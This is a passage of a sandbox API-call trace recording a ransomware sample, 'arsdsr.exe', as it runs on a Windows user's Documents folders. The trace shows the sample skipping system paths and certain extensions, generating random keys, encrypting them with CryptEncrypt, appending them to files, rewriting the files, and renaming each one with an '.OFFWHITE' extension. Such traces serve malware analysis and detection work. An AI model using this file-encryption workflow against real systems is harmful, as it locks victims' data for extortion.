HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt.OFFWHITE" [0133.253] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\g38zpktnvtqwvlgj_n4u.ppt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\g38ZPKTnVtQWvlgJ_n4u.ppt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\g38zpktnvtqwvlgj_n4u.ppt.offwhite")) returned 1 [0133.254] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b979f0, ftCreationTime.dwHighDateTime=0x1d5ddde, ftLastAccessTime.dwLowDateTime=0x55b5ee50, ftLastAccessTime.dwHighDateTime=0x1d5dd56, ftLastWriteTime.dwLowDateTime=0x55b5ee50, ftLastWriteTime.dwHighDateTime=0x1d5dd56, nFileSizeHigh=0x0, nFileSizeLow=0x3cc3, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="uiXcEdbTotwVNN.ods", cAlternateFileName="UIXCED~1.ODS")) returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2=".") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="..") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="...") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="windows") returned -1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="$recycle.bin") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="rsa") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="ntuser.dat") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="programdata") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="appdata") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="program files") returned 1 [0133.254] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="program files (x86)") returned 1 [0133.254] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0133.254] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="uiXcEdbTotwVNN.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods" [0133.254] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.254] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.254] PathFindExtensionW (pszPath="uiXcEdbTotwVNN.ods") returned=".ods" [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".exe") returned 1 [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".log") returned 1 [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".cab") returned 1 [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".cmd") returned 1 [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".com") returned 1 [0133.254] lstrcmpiW (lpString1=".ods", lpString2=".cpl") returned 1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".url") returned -1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".ttf") returned -1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".mp3") returned 1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".pif") returned -1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".mp4") returned 1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".OFFWHITE") returned -1 [0133.255] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0133.255] lstrcmpiW (lpString1="uiXcEdbTotwVNN.ods", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0133.255] GetProcessHeap () returned 0x500000 [0133.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f718 [0133.255] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\uixcedbtotwvnn.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0133.255] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=15555) returned 1 [0133.255] GetProcessHeap () returned 0x500000 [0133.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.255] GetProcessHeap () returned 0x500000 [0133.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.255] GetProcessHeap () returned 0x500000 [0133.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.255] GetProcessHeap () returned 0x500000 [0133.256] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.256] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.256] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.256] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.256] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.256] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.256] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.256] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.256] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.256] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0133.256] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.256] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.256] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0133.256] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3cc3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.257] SetLastError (dwErrCode=0x0) [0133.257] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.259] GetLastError () returned 0x0 [0133.259] GetLastError () returned 0x0 [0133.259] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3dc3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.259] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0133.259] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3ec3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.259] WriteFile (in: hFile=0x218, lpBuffer=0x53f718*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x53f718*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0133.259] GetProcessHeap () returned 0x500000 [0133.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3cc3) returned 0x55c7c8 [0133.259] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.260] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x3cc3, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x3cc3, lpOverlapped=0x0) returned 1 [0133.261] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.261] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x3cc3, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3cc3, lpOverlapped=0x0) returned 1 [0133.261] GetProcessHeap () returned 0x500000 [0133.261] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0133.262] CloseHandle (hObject=0x218) returned 1 [0133.265] GetProcessHeap () returned 0x500000 [0133.265] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.265] GetProcessHeap () returned 0x500000 [0133.265] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.265] GetProcessHeap () returned 0x500000 [0133.265] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.265] GetProcessHeap () returned 0x500000 [0133.265] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.265] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods" [0133.265] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods.OFFWHITE" [0133.265] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\uixcedbtotwvnn.ods"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\uiXcEdbTotwVNN.ods.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\uixcedbtotwvnn.ods.offwhite")) returned 1 [0133.266] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b979f0, ftCreationTime.dwHighDateTime=0x1d5ddde, ftLastAccessTime.dwLowDateTime=0x55b5ee50, ftLastAccessTime.dwHighDateTime=0x1d5dd56, ftLastWriteTime.dwLowDateTime=0x55b5ee50, ftLastWriteTime.dwHighDateTime=0x1d5dd56, nFileSizeHigh=0x0, nFileSizeLow=0x3cc3, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="uiXcEdbTotwVNN.ods", cAlternateFileName="UIXCED~1.ODS")) returned 0 [0133.266] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0133.266] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfebaab70, ftCreationTime.dwHighDateTime=0x1d5e199, ftLastAccessTime.dwLowDateTime=0x20b12460, ftLastAccessTime.dwHighDateTime=0x1d5e060, ftLastWriteTime.dwLowDateTime=0x20b12460, ftLastWriteTime.dwHighDateTime=0x1d5e060, nFileSizeHigh=0x0, nFileSizeLow=0x14477, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName="VxSJ3_sEBOK94bD.rtf", cAlternateFileName="VXSJ3_~1.RTF")) returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2=".") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="..") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="...") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="windows") returned -1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="$recycle.bin") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="rsa") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="ntuser.dat") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="programdata") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="appdata") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="program files") returned 1 [0133.266] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="program files (x86)") returned 1 [0133.266] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" [0133.266] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\", lpString2="VxSJ3_sEBOK94bD.rtf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf" [0133.266] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.266] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.266] PathFindExtensionW (pszPath="VxSJ3_sEBOK94bD.rtf") returned=".rtf" [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".log") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".cab") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".cmd") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".com") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".cpl") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".url") returned -1 [0133.266] lstrcmpiW (lpString1=".rtf", lpString2=".ttf") returned -1 [0133.267] lstrcmpiW (lpString1=".rtf", lpString2=".mp3") returned 1 [0133.267] lstrcmpiW (lpString1=".rtf", lpString2=".pif") returned 1 [0133.267] lstrcmpiW (lpString1=".rtf", lpString2=".mp4") returned 1 [0133.267] lstrcmpiW (lpString1=".rtf", lpString2=".OFFWHITE") returned 1 [0133.267] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0133.267] lstrcmpiW (lpString1="VxSJ3_sEBOK94bD.rtf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0133.267] GetProcessHeap () returned 0x500000 [0133.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f728 [0133.267] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\vxsj3_sebok94bd.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0133.267] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=83063) returned 1 [0133.267] GetProcessHeap () returned 0x500000 [0133.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.267] GetProcessHeap () returned 0x500000 [0133.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.267] GetProcessHeap () returned 0x500000 [0133.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.267] GetProcessHeap () returned 0x500000 [0133.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.267] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.267] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.267] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.267] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.267] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.267] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.267] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.267] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.268] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0133.268] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.268] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.268] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0133.268] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x14477, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.268] SetLastError (dwErrCode=0x0) [0133.268] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0133.270] GetLastError () returned 0x0 [0133.270] GetLastError () returned 0x0 [0133.270] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x14577, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.270] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0133.270] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x14677, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.270] WriteFile (in: hFile=0x214, lpBuffer=0x53f728*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x53f728*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0133.270] GetProcessHeap () returned 0x500000 [0133.270] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14477) returned 0x55b7c0 [0133.270] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.270] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x14477, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x14477, lpOverlapped=0x0) returned 1 [0133.275] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.275] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x14477, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x14477, lpOverlapped=0x0) returned 1 [0133.275] GetProcessHeap () returned 0x500000 [0133.275] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0133.275] CloseHandle (hObject=0x214) returned 1 [0133.281] GetProcessHeap () returned 0x500000 [0133.281] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.281] GetProcessHeap () returned 0x500000 [0133.282] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.282] GetProcessHeap () returned 0x500000 [0133.282] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.282] GetProcessHeap () returned 0x500000 [0133.282] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.282] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf" [0133.282] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf.OFFWHITE" [0133.282] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\vxsj3_sebok94bd.rtf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\VxSJ3_sEBOK94bD.rtf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\vxsj3_sebok94bd.rtf.offwhite")) returned 1 [0133.283] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfebaab70, ftCreationTime.dwHighDateTime=0x1d5e199, ftLastAccessTime.dwLowDateTime=0x20b12460, ftLastAccessTime.dwHighDateTime=0x1d5e060, ftLastWriteTime.dwLowDateTime=0x20b12460, ftLastWriteTime.dwHighDateTime=0x1d5e060, nFileSizeHigh=0x0, nFileSizeLow=0x14477, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName="VxSJ3_sEBOK94bD.rtf", cAlternateFileName="VXSJ3_~1.RTF")) returned 0 [0133.283] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0133.283] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24a46420, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x40d04730, ftLastAccessTime.dwHighDateTime=0x1d5dd63, ftLastWriteTime.dwLowDateTime=0x40d04730, ftLastWriteTime.dwHighDateTime=0x1d5dd63, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="YQOkdNBO_856WnMN", cAlternateFileName="YQOKDN~1")) returned 0 [0133.283] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0133.284] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: 